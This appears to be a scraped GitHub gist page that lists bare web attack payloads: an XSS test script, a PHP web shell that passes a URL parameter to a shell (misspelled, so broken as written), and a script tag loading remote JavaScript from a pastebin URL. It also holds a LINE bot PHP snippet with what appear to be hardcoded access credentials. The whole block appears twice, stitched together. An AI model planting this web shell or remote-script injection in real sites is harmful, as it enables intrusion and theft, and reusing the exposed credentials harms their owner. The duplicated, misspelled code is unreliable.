Cecep Budiman c3budiman

## gist:9f7ddf08f52e1b332aa12a707a561934
1.
<script>alert("XSS VULN");</script>
2.
<?php $cmd=$GET['mrxy'];$out=shell_ecex($cmd); echo "<pre>".$out."</pre>"?>
3.
<script type="text/javascript" src="https://pastebin.com/raw/BndBwF1Y"></script>
4.
<h1> tes </h1>

## Bot line unisent
<?php
require_once('./line_class.php');

$channelAccessToken = 'C+rP3iraU1jkh4xRXmf1EiSmshbxBkxYmNM8ZyN7wTTYPSiEPxcjShO7k9GlBH88mwOK711vKTlQDUa1anRyn96rHzLDznyYBBoVgXg1ZrpYW8rr/pzWT+/P5rZG7SyWXmhVRrNMdkBDtJPYzms/jQdB04t89/1O/w1cDnyilFU='; //sesuaikan
$channelSecret = 'cee9a47046aed36d01fd4de159285569';//sesuaikan
$client = new LINEBotTiny($channelAccessToken, $channelSecret);
$userId 	= $client->parseEvents()[0]['source']['userId'];
$replyToken = $client->parseEvents()[0]['replyToken'];
$timestamp	= $client->parseEvents()[0]['timestamp'];
$message 	= $client->parseEvents()[0]['message'];
	1.
	<script>alert("XSS VULN");</script>
	2.
	<?php $cmd=$GET['mrxy'];$out=shell_ecex($cmd); echo "<pre>".$out."</pre>"?>
	3.
	<script type="text/javascript" src="https://pastebin.com/raw/BndBwF1Y"></script>
	4.
	<h1> tes </h1>
	<?php
	require_once('./line_class.php');

	$channelAccessToken = 'C+rP3iraU1jkh4xRXmf1EiSmshbxBkxYmNM8ZyN7wTTYPSiEPxcjShO7k9GlBH88mwOK711vKTlQDUa1anRyn96rHzLDznyYBBoVgXg1ZrpYW8rr/pzWT+/P5rZG7SyWXmhVRrNMdkBDtJPYzms/jQdB04t89/1O/w1cDnyilFU='; //sesuaikan
	$channelSecret = 'cee9a47046aed36d01fd4de159285569';//sesuaikan
	$client = new LINEBotTiny($channelAccessToken, $channelSecret);
	$userId = $client->parseEvents()[0]['source']['userId'];
	$replyToken = $client->parseEvents()[0]['replyToken'];
	$timestamp = $client->parseEvents()[0]['timestamp'];
	$message = $client->parseEvents()[0]['message'];